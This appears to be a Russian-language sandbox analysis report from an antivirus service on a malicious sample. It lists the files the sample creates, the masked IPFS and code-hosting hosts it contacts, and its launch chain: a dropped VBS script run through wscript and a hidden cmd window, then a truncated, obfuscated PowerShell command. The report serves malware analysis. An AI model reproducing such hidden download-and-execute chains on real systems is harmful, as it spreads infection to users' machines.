Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ixp000.tmp\bu.vbs
Удаляет следующие файлы
- %TEMP%\ixp000.tmp\bu.vbs
Сетевая активность
Подключается к
- 'ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link':443
- 'pk#.goog':80
- 'bi###cket.org':443
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- '34.##9.100.209':443
- '<DNS_SERVER>':53
- 'ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link':443
- 'bi###cket.org':443
UDP
- DNS ASK ba##################wnvxzs23m3kjr6bfvgszbfwybmmcosl4rrhvuo4.ipfs.w3s.link
- DNS ASK pk#.goog
- DNS ASK bi###cket.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\bu.vbs"
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c bu.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='Wwd@OAGUAdAAuAFMAZQd@yAHYAaQd@jAGUAUAd@vAGkAbgd@0AE0AYQd@uAGEAZwd@lAHIAXQA6ADoAUwd@lAGMAdQd@yAGkAdAd@5AFAAcgd@vAHQAbwd@jAG8AbAAgAD0AIAd@bAE4AZQd@0AC4AUwd@lAGMAdQd@yAGkAdAd@5AFAAcgd@v... (со скрытым окном)
